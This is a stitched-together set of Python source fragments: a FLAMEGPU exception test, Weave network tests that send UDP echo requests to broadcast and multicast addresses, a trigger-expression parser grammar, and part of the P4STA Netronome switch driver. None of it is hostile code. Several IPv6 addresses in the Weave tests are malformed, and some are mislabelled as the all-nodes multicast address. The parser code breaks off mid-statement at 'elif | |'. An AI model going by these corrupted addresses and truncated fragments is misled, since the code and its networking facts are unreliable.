assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
def test_broadcast_ipv4(self):
'''Send UDP Echo requests to IPv4 broadcast address (255.255.255.255).'''
# Start listening servers on nodes 2 and 4.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node4', '--node-id 4 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 broadcast Echo requests from node1 to the IPv4 broadcast address.
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --dest-addr 255.255.255.255 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node4')
# Verify the Echo request was received by node2 and node4 with the correct source address.
self.assertTrue('Echo Request from node 1 (192.168.1.1)' in self.getOutput('node2'), msg='Echo request not found (node2)')
self.assertTrue('Echo Request from node 1 (192.168.2.1)' in self.getOutput('node4'), msg='Echo request not found (node4)')
# Verify that an Echo response was received by node1 from at least one of the two server nodes.
node1Output = self.getOutput('node1')
self.assertTrue(('Echo Response from node 2 (192.168.1.2)' in node1Output or 'Echo Response from node 4 (192.168.2.4)' in node1Output),
msg='Echo Response not found (node1)')
def test_intf_multicast_ll(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fffc00:db20:35b:7399::5) on a specific interface. Use sender's link-local address as source address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 over wlan2 (net3).
self.startWeavePing('node1', '--node-id 1 --fabric-id 0 --subnet 1 --udp --count 5 --interval 200 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b%wlan2 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fe80::3:1)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 3 (fe80::3:3)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_intf_multicast_ula(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fffc00:db20:35b:7399::5) on a specific interface. Use sender's ULA as source address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 over wlan2 (net3).
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b%wlan2 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fd0fc00:db20:35b:7399::5)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 3 (fd00:0:1:3::3)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_intf_broadcast_ipv4(self):
'''Send UDP Echo requests to IPv4 broadcast address (255.255.255.255) over a specific interface.'''
# Start listening servers on nodes 2 and 4.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node4', '--node-id 4 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 broadcast Echo requests from node1 over wlan1 (net2).
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --dest-addr 255.255.255.255%wlan1 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node4')
# Verify the Echo request was received by node4 with the correct source address.
self.assertTrue('Echo Request from node 1 (192.168.2.1)' in self.getOutput('node4'), msg='Echo request not found (node4)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 4 (192.168.2.4)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_sender_bound_ipv6_multicast(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fffc00:db20:35b:7399::5) with sender bound to IPv6 listening address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 with sender bound to its wlan2 (net3) IPv6 ULA address.
self.startWeavePing('node1', '--node-id 1 --fabric-id 0 --subnet 1 --udp --count 5 --interval 200 --node-addr fd00:0:1:3::1 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fdfc00:db20:35b:7399::5)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 3 (fd0fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_sender_bound_ipv4_broadcast(self):
'''Send UDP Echo requests to IPv4 broadcast address (255.255.255.255) with sender bound to IPv4 listening address.'''
# Start listening servers on nodes 2 and 4.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node4', '--node-id 4 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 broadcast Echo requests from node1 with sender bound to its wlan2 (net3) IPv4 address.
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --node-addr 192.168.2.1 --dest-addr 255.255.255.255 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node4')
# Verify the Echo request was received by node4 with the correct source address.
self.assertTrue('Echo Request from node 1 (192.168.2.1)' in self.getOutput('node4'), msg='Echo request not found (node4)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 4 (192.168.2.4)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_listener_bound_multicast_ll(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b) with listeners bound to IPv6 addresses. Use sender's link-local as source address.'''
# Start listening servers on nodes 2 and 3 bound to their respective ULAs.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --node-addr fdfc00:db20:35b:7399::5 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --node-addr fdfc00:db20:35b:7399::5 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 to the IPv6 all-nodes, link-scope address (fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b).
# Force the source address of the requests to be node1's link-local address by configuring it
# to NOT be a member of a fabric (i.e. fabric id = 0).
self.startWeavePing('node1', '--node-id 1 --fabric-id 0 --subnet 1 --udp --count 5 --interval 200 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node2 and node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fe80::1:1)' in self.getOutput('node2'), msg='Echo request not found (node2)')
self.assertTrue('Echo Request from node 1 (fe80::3:1)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify that an Echo response was received by node1 from at least one of the two server nodes.
# Note that, because the listeners are bound to specific IPv6 ULAs, the responses come from those ULAs, rather than
# from the nodes' link-local addresses, as would be expected if the nodes weren't bound.
node1Output = self.getOutput('node1')
self.assertTrue(('Echo Response from node 2 (fd0fdf8:f53e:61e4::18)' in node1Output or 'Echo Response from node 3 (fd0fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b)' in node1Output),
msg='Echo Response not found (node1)')
# Repository: mouton5000/DiscreteEventApplicationEditor
import lrparsing
from lrparsing import Keyword, List, Prio, Ref, Token, Opt
from arithmeticExpressions import ALitteral, Addition, Subtraction, Product, Division, EuclideanDivision, Modulo, \
Power, Func, UndefinedLitteral, Min, Max, globalsHeightExpression, globalsWidthExpression, globalsFpsExpression
from triggerExpressions import BLitteral, Timer, eLock, \
Equals, GreaterThan, LowerThan, GeqThan, LeqThan, \
NotEquals, And, Or, Not, Is, AnyEval, RandomEval, Del, \
SelectMinEval, SelectMaxEval, UniqueEval, PropertyTriggerExpression, \
EventTriggerExpression, SpriteTriggerExpression, TextTriggerExpression, \
LineTriggerExpression, OvalTriggerExpression, RectTriggerExpression, PolygonTriggerExpression
from database import Variable
from keywords import KEYWORD_ID, KEYWORD_FILENAME, KEYWORD_COLOR, KEYWORD_FONT_NAME, KEYWORD_FONT_SIZE, KEYWORD_H, \
KEYWORD_TEXT, KEYWORD_WIDTH, KEYWORD_W, KEYWORD_X_INT, KEYWORD_X, KEYWORD_Y_INT, KEYWORD_Y, KEYWORD_Z, \
KEYWORD_ROTATE, KEYWORD_SCALE
from utils.mathutils import sign
from random import random, randint
from math import cos, sin, tan, exp, log, floor, ceil, acos, asin, atan, cosh, sinh, tanh, acosh, atanh, asinh
class TriggerParser(lrparsing.Grammar):
class T(lrparsing.TokenRegistry):
integer = Token(re='[0-9]+')
float = Token(re='[0-9]+\.[0-9]+')
string = Token(re='\'[^\']*\'')
true = Token('true')
false = Token('false')
variable = Token(re='[A-Z][A-Z_0-9]*')
uvariable = Token('_')
prop = Token(re='p[A-Z][A-Za-z_0-9]*')
event = Token(re='e[A-Z][A-Za-z_0-9]*')
graphicsSprite = Token(re='gs[A-Z][A-Za-z_0-9]*')
graphicsLine = Token(re='gl[A-Z][A-Za-z_0-9]*')
graphicsOval = Token(re='go[A-Z][A-Za-z_0-9]*')
graphicsRect = Token(re='gr[A-Z][A-Za-z_0-9]*')
graphicsPolygon = Token(re='gp[A-Z][A-Za-z_0-9]*')
graphicsText = Token(re='gt[A-Z][A-Za-z_0-9]*')
idkw = Token('id')
coordX = Token('x')
coordY = Token('y')
coordZ = Token('z')
coordXInt = Token(re='x[1-9][0-9]*')
coordYInt = Token(re='y[1-9][0-9]*')
coordW = Token('w')
coordH = Token('h')
rotate = Token('rotate')
scale = Token('scale')
fileName = Token('fileName')
color = Token('color')
width = Token('width')
text = Token('text')
fontName = Token('fontName')
fontSize = Token('fontSize')
cosf = Token('cos')
sinf = Token('sin')
tanf = Token('tan')
expf = Token('exp')
logf = Token('log')
absf = Token('abs')
signf = Token('sign')
floorf = Token('floor')
ceilf = Token('ceil')
roundf = Token('round')
acosf = Token('acos')
asinf = Token('asin')
atanf = Token('atan')
chf = Token('ch')
shf = Token('sh')
thf = Token('th')
achf = Token('ach')
ashf = Token('ash')
athf = Token('ath')
rand = Token('rand')
randint = Token('randint')
lenf = Token('len')
minf = Token('min')
maxf = Token('max')
globalsKw = Token('globals')
globalsFpsKw = Token('fps')
globalsHeightKw = Token('screenHeight')
globalsWidthKw = Token('screenWidth')
elock = Keyword('eLock')
timer = Token('timer')
iskw = Token('is')
delkw = Token('del')
andkw = Token('and')
orkw = Token('or')
notkw = Token('not')
anyEval = Token('anyEval')
randomEval = Token('randomEval')
minEvalKw = Token('minEval')
maxEvalKw = Token('maxEval')
uniqueEval = Token('uniqueEval')
arithmExpr = Ref('arithmExpr')
boolExpr = Ref('boolExpr')
litExpr = T.true | T.false
timerExpr = T.timer + '(' + arithmExpr + ')'
eLockParameters = List(arithmExpr, Token(','), min=1)
eLockExpr = T.elock + '(' + arithmExpr + Opt(',' + eLockParameters) + ')'
parameter = Prio(T.variable, arithmExpr) | T.uvariable
namedParameterKW = arithmExpr | T.idkw | \
T.coordX | T.coordY | T.coordZ | \
T.coordXInt | T.coordYInt | \
T.coordH | T.coordW | \
T.rotate | T.scale | \
T.fileName | \
T.color | T.width | \
T.text | T.fontName | T.fontSize
namedParameter = namedParameterKW + '=' + parameter
parameters = \
Prio(List(parameter, Token(',')) + Opt(',' + List(namedParameter, Token(','))),
List(namedParameter, Token(',')))
parameterizedType = T.prop | T.event | T.graphicsSprite | T.graphicsText | T.graphicsLine | \
T.graphicsOval | T.graphicsRect | T.graphicsPolygon
parameterizedExpr = parameterizedType + '(' + parameters + ')'
compareArithmExpr = arithmExpr << (Token('==') | Token('>') | Token('<') | Token('<=') |
Token('>=') | Token('!=')) << arithmExpr
andExpr = boolExpr >> T.andkw >> boolExpr
orExpr = boolExpr >> T.orkw >> boolExpr
notExpr = T.notkw + boolExpr
isExpr = T.variable + T.iskw + arithmExpr
delExpr = T.delkw + T.variable
parExpr = '(' + boolExpr + ')'
anyEvalExpr = T.anyEval + parExpr
randomEvalExpr = T.randomEval + parExpr
minEvalExpr = T.minEvalKw + '[' + arithmExpr + ']' + parExpr
maxEvalExpr = T.maxEvalKw + '[' + arithmExpr + ']' + parExpr
uniqueEvalExpr = T.uniqueEval + parExpr
boolExpr = Prio(litExpr,
timerExpr,
eLockExpr,
parameterizedExpr,
parExpr,
isExpr,
delExpr,
compareArithmExpr,
notExpr,
andExpr,
orExpr,
anyEvalExpr,
randomEvalExpr,
minEvalExpr,
maxEvalExpr,
uniqueEvalExpr
)
addArithmExpr = arithmExpr << Token('+') << arithmExpr
minusArithmExpr = Opt(arithmExpr) << Token('-') << arithmExpr
multArithmExpr = arithmExpr << (Token('*') | Token('/') | Token('//') | Token('%')) << arithmExpr
powerArithmExpr = arithmExpr << Token('**') << arithmExpr
constantArithmExpr = Token('pi') | Token('e')
parArithmExpr = '(' + arithmExpr + ')'
unaryFuncArithmExpr = (T.cosf | T.sinf | T.tanf | T.expf | T.logf | T.absf | T.signf | T.floorf | T.ceilf | T.roundf
| T.acosf | T.asinf | T.atanf | T.shf | T.chf | T.thf | T.ashf | T.achf | T.athf | T.lenf
| T.rand | T.randint) \
+ parArithmExpr
binaryFuncArithmExpr = (T.minf | T.maxf) + '(' + arithmExpr + ',' + arithmExpr + ')'
globalsKeyWord = T.globalsFpsKw | T.globalsHeightKw | T.globalsWidthKw
globalsExpr = T.globalsKw + '(' + globalsKeyWord + ')'
arithmExpr = Prio(T.integer, T.float, T.variable, T.string, constantArithmExpr,
globalsExpr, parArithmExpr,
unaryFuncArithmExpr, binaryFuncArithmExpr,
powerArithmExpr, multArithmExpr, minusArithmExpr, addArithmExpr)
START = boolExpr
COMMENTS = ( # Allow C and Python comments
Token(re="#(?:[^\r\n]*(?:\r\n?|\n\r?))") |
Token(re="/[*](?:[^*]|[*][^/])*[*]/"))
@classmethod
def parse(cls, expr, tree_factory=None, on_error=None, log=None):
tree = super(TriggerParser, cls).parse(expr, tree_factory, on_error, log)
return cls.buildExpression(tree)
@classmethod
def buildExpression(cls, tree):
rootName = tree[0]
def buildAnd():
a1 = cls.buildExpression((tree[1]))
a2 = cls.buildExpression((tree[3]))
return And(a1, a2)
def buildAnyEval():
expr = cls.buildExpression(tree[2])
return AnyEval(expr)
def buildArithmetic():
return cls.buildArithmeticExpression(tree)
def buildCompare():
a1 = cls.buildExpression(tree[1])
a2 = cls.buildExpression(tree[3])
if tree[2][1] == '==':
return Equals(a1, a2)
elif tree[2][1] == '>':
return GreaterThan(a1, a2)
elif tree[2][1] == '<':
return LowerThan(a1, a2)
elif tree[2][1] == '>=':
return GeqThan(a1, a2)
elif tree[2][1] == '<=':
return LeqThan(a1, a2)
elif tree[2][1] == '!=':
return NotEquals(a1, a2)
def buildDel():
variable = cls.buildExpression(tree[2])
return Del(variable)
def buildDoubleNext():
return cls.buildExpression(tree[2])
def buildElock():
priority = cls.buildExpression(tree[3])
if len(tree) >= 6:
args = cls.buildExpression(tree[5])
else:
args = []
return eLock(priority, args)
def buildELockParameters():
return [cls.buildExpression(arg) for arg in tree[1::2]]
def buildIs():
variable = cls.buildExpression(tree[1])
function = cls.buildExpression(tree[3])
return Is(variable, function)
def buildLitteral():
return BLitteral(tree[1][1] == 'true')
def buildMaxEvalExpr():
arithmExpr = cls.buildExpression(tree[3])
expr = cls.buildExpression(tree[5])
return SelectMaxEval(expr, arithmExpr)
def buildMinEvalExpr():
arithmExpr = cls.buildExpression(tree[3])
expr = cls.buildExpression(tree[5])
return SelectMinEval(expr, arithmExpr)
def buildNamedParameter():
name = cls.buildExpression(tree[1])
parameter = cls.buildExpression(tree[3])
return name, parameter
def buildNext():
return cls.buildExpression(tree[1])
def buildNot():
a1 = cls.buildExpression((tree[2]))
return Not(a1)
def buildOr():
a1 = cls.buildExpression((tree[1]))
a2 = cls.buildExpression((tree[3]))
return Or(a1, a2)
def buildParameterized():
exprType, exprValue = cls.buildExpression(tree[1])
exprTypeAction = {
TriggerParser.T.prop: (PropertyTriggerExpression, 1),
TriggerParser.T.event: (EventTriggerExpression, 1),
TriggerParser.T.graphicsSprite: (SpriteTriggerExpression, 2),
TriggerParser.T.graphicsLine: (LineTriggerExpression, 2),
TriggerParser.T.graphicsOval: (OvalTriggerExpression, 2),
TriggerParser.T.graphicsRect: (RectTriggerExpression, 2),
TriggerParser.T.graphicsPolygon: (PolygonTriggerExpression, 2),
TriggerParser.T.graphicsText: (TextTriggerExpression, 2)
}
clsCons, offset = exprTypeAction[exprType]
args, kwargs = cls.buildExpression(tree[3])
if offset > 0:
name = exprValue[offset:]
return clsCons(name, args, kwargs)
else:
return clsCons(args, kwargs)
def buildParameterizedType():
return tree[1][0], tree[1][1]
def buildParameters():
buildArgs = [cls.buildExpression(arg) for arg in tree[1::2]]
args = [arg for arg in buildArgs if not isinstance(arg, tuple)]
kwargs = {kwarg[0]: kwarg[1] for kwarg in buildArgs if isinstance(kwarg, tuple)}
return args, kwargs
def buildRandomEval():
expr = cls.buildExpression(tree[2])
return RandomEval(expr)
def buildTimer():
nbFrames = cls.buildExpression((tree[3]))
return Timer(nbFrames)
def buildUniqueEvalExpr():
expr = cls.buildExpression(tree[2])
return UniqueEval(expr)
def keywordColorValue():
return KEYWORD_COLOR
def keywordFileNameValue():
return KEYWORD_FILENAME
def keywordFontNameValue():
return KEYWORD_FONT_NAME
def keywordFontSizeValue():
return KEYWORD_FONT_SIZE
def keywordHValue():
return KEYWORD_H
def keywordIdValue():
return KEYWORD_ID
def keywordRotateValue():
return KEYWORD_ROTATE
def keywordScaleValue():
return KEYWORD_SCALE
def keywordTextValue():
return KEYWORD_TEXT
def keywordWidthValue():
return KEYWORD_WIDTH
def keywordWValue():
return KEYWORD_W
def keywordXIntValue():
value = int(tree[1][1:])
return KEYWORD_X_INT[value]
def keywordXValue():
return KEYWORD_X
def keywordYIntValue():
value = int(tree[1][1:])
return KEYWORD_Y_INT[value]
def keywordYValue():
return KEYWORD_Y
def keywordZValue():
return KEYWORD_Z
def unnamedVariableValue():
return UndefinedLitteral()
def value():
return tree[1]
def variableValue():
return Variable(tree[1])
booleanSymbols = {
TriggerParser.T.variable: variableValue,
TriggerParser.T.uvariable: unnamedVariableValue,
TriggerParser.T.idkw: keywordIdValue,
TriggerParser.T.coordX: keywordXValue,
TriggerParser.T.coordY: keywordYValue,
TriggerParser.T.coordZ: keywordZValue,
TriggerParser.T.coordXInt: keywordXIntValue,
TriggerParser.T.coordYInt: keywordYIntValue,
TriggerParser.T.coordW: keywordWValue,
TriggerParser.T.coordH: keywordHValue,
TriggerParser.T.rotate: keywordRotateValue,
TriggerParser.T.scale: keywordScaleValue,
TriggerParser.T.fileName: keywordFileNameValue,
TriggerParser.T.color: keywordColorValue,
TriggerParser.T.width: keywordWidthValue,
TriggerParser.T.text: keywordTextValue,
TriggerParser.T.fontName: keywordFontNameValue,
TriggerParser.T.fontSize: keywordFontSizeValue,
TriggerParser.arithmExpr: buildArithmetic,
TriggerParser.boolExpr: buildNext,
TriggerParser.litExpr: buildLitteral,
TriggerParser.timerExpr: buildTimer,
TriggerParser.eLockParameters: buildELockParameters,
TriggerParser.eLockExpr: buildElock,
TriggerParser.parameter: buildNext,
TriggerParser.namedParameterKW: buildNext,
TriggerParser.namedParameter: buildNamedParameter,
TriggerParser.parameters: buildParameters,
TriggerParser.parameterizedType: buildParameterizedType,
TriggerParser.parameterizedExpr: buildParameterized,
TriggerParser.compareArithmExpr: buildCompare,
TriggerParser.andExpr: buildAnd,
TriggerParser.orExpr: buildOr,
TriggerParser.notExpr: buildNot,
TriggerParser.isExpr: buildIs,
TriggerParser.delExpr: buildDel,
TriggerParser.parExpr: buildDoubleNext,
TriggerParser.anyEvalExpr: buildAnyEval,
TriggerParser.randomEvalExpr: buildRandomEval,
TriggerParser.minEvalExpr: buildMinEvalExpr,
TriggerParser.maxEvalExpr: buildMaxEvalExpr,
TriggerParser.uniqueEvalExpr: buildUniqueEvalExpr,
TriggerParser.parArithmExpr: buildArithmetic,
TriggerParser.START: buildNext,
}
return booleanSymbols[rootName]()
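# Illustrative example (input string assumed, not taken from the project):
# parsing a trigger such as
#     X is 3 + 2 and timer(5)
# with TriggerParser.parse(...) dispatches through the handlers above and
# yields an And(Is(Variable('X'), Addition(...)), Timer(...)) expression tree.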
@classmethod
def buildArithmeticExpression(cls, tree):
rootName = tree[0]
def buildBinaryExpression():
a1 = cls.buildArithmeticExpression(tree[1])
a3 = cls.buildArithmeticExpression(tree[3])
if tree[2][1] == '+':
return Addition(a1, a3)
elif tree[2][1] == '-':
return Subtraction(a1, a3)
elif tree[2][1] == '*':
return Product(a1, a3)
elif tree[2][1] == '/':
return Division(a1, a3)
elif tree[2][1] == '//':
return EuclideanDivision(a1, a3)
elif tree[2][1] == '%':
return Modulo(a1, a3)
elif | |
# Repository: fridolinsiegmund/P4STA
# File: stamper_targets/netronome/netronome.py
# Copyright 2020-present <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import struct
import time
import traceback
from abstract_target import AbstractTarget
import P4STA_utils
from thrift import Thrift
from thrift.transport import TSocket, TTransport, TZlibTransport
from thrift.protocol import TBinaryProtocol
from stamper_targets.netronome.sdk6_rte import RunTimeEnvironment
from stamper_targets.netronome.sdk6_rte.ttypes import RegisterArrayArg, McastCfgEntry, TableEntry, DesignLoadArgs
TIMESTAMP_FRC = True
class RteError(Exception):
pass
class TargetImpl(AbstractTarget):
def __init__(self, target_cfg):
super().__init__(target_cfg)
self.speed_list = []
def _get_rte_client(self, cfg):
transport = TZlibTransport.TZlibTransport(TTransport.TBufferedTransport(TSocket.TSocket(cfg["p4_dev_ssh"], cfg["thrift_port"])))
rte_client = RunTimeEnvironment.Client(TBinaryProtocol.TBinaryProtocol(transport))
try:
transport.open()
except TTransport.TTransportException:
self.execute_ssh(cfg, "sudo systemctl start nfp-sdk6-rte.service")
time.sleep(1)
transport.open()
return rte_client
# returns a dict["real_ports"] and ["logical_ports"]
def port_lists(self):
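# Logical port numbers below pack the port index into the low byte and a
# port-class selector into bits 8 and up: 0 for the physical ports, 3 for
# the host vNIC ports, mirroring the expressions used in the two loops.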
real_ports = []
logical_ports = []
# physical ports
for p in range(4):
real_ports.append("p" + str(p))
logical_ports.append(str((p & 0xff) | (0 << 8)))
# host ports
for p in range(64):
real_ports.append("v0." + str(p))
logical_ports.append(str((p & 0xff) | (3 << 8)))
return {"real_ports": real_ports, "logical_ports": logical_ports}
# deploy config file (table entries) to p4 device
def deploy(self, cfg):
try:
print("DEPLOY STARTED AT NETRONOME")
rte_client = self._get_rte_client(cfg)
tables = {t.tbl_name: t for t in rte_client.table_list_all()}
# clear tables of non-default rules
for table in tables.values():
for entry in rte_client.table_retrieve(table.tbl_id):
if not entry.default_rule:
rte_client.table_entry_delete(table.tbl_id, entry)
# clear multicast
for mccfg in rte_client.mcast_config_get_all():
mccfg.ports = []
rte_client.mcast_config_set(mccfg)
# set register r_extHost_max
reg_id = list(filter(lambda r: r.name == "r_extHost_max", rte_client.register_list_all()))[0].id
rte_client.register_field_set(RegisterArrayArg(reg_id=reg_id), 0, str(int(cfg["multicast"]) - 1))
all_ports = []
for loadgen_grp in cfg["loadgen_groups"]:
all_ports.extend([int(host["p4_port"]) for host in loadgen_grp["loadgens"]])
rte_client.mcast_config_set(McastCfgEntry(group_id=0, ports=all_ports))
rte_client.mcast_config_set(McastCfgEntry(group_id=1, ports=all_ports))
# create a mcast group consisting of loadgen_grp and ext host
group = 2
for loadgen_grp in cfg["loadgen_groups"]:
ports = [int(host["p4_port"]) for host in loadgen_grp["loadgens"]]
ports.append(int(cfg["ext_host"]))
loadgen_grp["mcast_grp"] = group
group = group + 1
print("Added ports " + str(ports) + " to mcast grp " + str(loadgen_grp["mcast_grp"]))
rte_client.mcast_config_set(McastCfgEntry(group_id=loadgen_grp["mcast_grp"], ports=ports))
def table_entry_add(table, rule_name, match, action):
print(rule_name + ": " + table + " | match: " + str(match) + " => " + str(action))
match_json = "{{{0}}}".format(",".join(['"{0}":{{"value":"{1}"}}'.format(k, v) for k, v in match.items()]))
action_json = "{{{0}}}".format('"type":"{0}","data":{{{1}}}'.format(action[0], ",".join(['"{0}":{{"value":"{1}"}}'.format(k, v) for k, v in action[1].items()])))
ret = rte_client.table_entry_add(tables[table].tbl_id, TableEntry(
rule_name=rule_name,
match=match_json.encode('ascii'),
actions=action_json.encode('ascii')))
if ret.value != 0:
print("Raise Error in Netronome table_entry_add")
raise RteError(ret.reason)
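# For example (values illustrative), a call such as
#     table_entry_add("ingress::t_l1_forwarding", "r0",
#                     {"standard_metadata.ingress_port": "1"},
#                     ["ingress::send", {"spec": "2"}])
# produces the RTE JSON strings
#     match:   {"standard_metadata.ingress_port":{"value":"1"}}
#     actions: {"type":"ingress::send","data":{"spec":{"value":"2"}}}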
# loadgenerators -> dut
for loadgen_grp in cfg["loadgen_groups"]:
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"] and dut["use_port"] == "checked":
for host in loadgen_grp["loadgens"]:
table_entry_add("ingress::t_l1_forwarding", "grp{}_loadgen{}_dut{}".format(loadgen_grp["group"], host["id"], dut["id"]),
{"standard_metadata.ingress_port": host["p4_port"]},
["ingress::send", {"spec": dut["p4_port"]}])
# dut -> server/clients (forwarding mode)
# must be executed before t_lx_forwarding
if int(cfg["forwarding_mode"]) >= 2:
table_entry_add("ingress::t_bcast_forwarding", "bcast_mg1",
{"ethernet.dstAddr": "0xffffffffffff"},
["ingress::send", {"spec": "mg1"}])
if cfg["forwarding_mode"] == "1":
for dut in cfg["dut_ports"]:
if dut["use_port"] == "checked":
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["group"] == dut["id"] and len(loadgen_grp["loadgens"]) > 0:
table_entry_add("ingress::t_l1_forwarding", "dut{}_grp{}_host{}".format(dut["id"], loadgen_grp["group"], 0), # host 0 because of L1 forwarding
{"standard_metadata.ingress_port": dut["p4_port"]},
["ingress::send", {"spec": loadgen_grp["loadgens"][0]["p4_port"]}])
break
elif cfg["forwarding_mode"] == "2":
for loadgen_grp in cfg["loadgen_groups"]:
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"] and dut["use_port"] == "checked":
for host in loadgen_grp["loadgens"]:
table_entry_add("ingress::t_l2_forwarding", "dut{}_grp{}_host{}".format(dut["id"], loadgen_grp["group"], host["id"]),
{"standard_metadata.ingress_port": dut["p4_port"],
"ethernet.dstAddr": "0x{}".format(host["loadgen_mac"].replace(":", ""))},
["ingress::send", {"spec": host["p4_port"]}])
elif cfg["forwarding_mode"] == "3":
for loadgen_grp in cfg["loadgen_groups"]:
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"] and dut["use_port"] == "checked":
for host in loadgen_grp["loadgens"]:
table_entry_add("ingress::t_l2_forwarding", "dut{}_grp{}_host{}".format(dut["id"], loadgen_grp["group"], host["id"]),
{"standard_metadata.ingress_port": dut["p4_port"],
"ipv4.dstAddr": host["loadgen_ip"]},
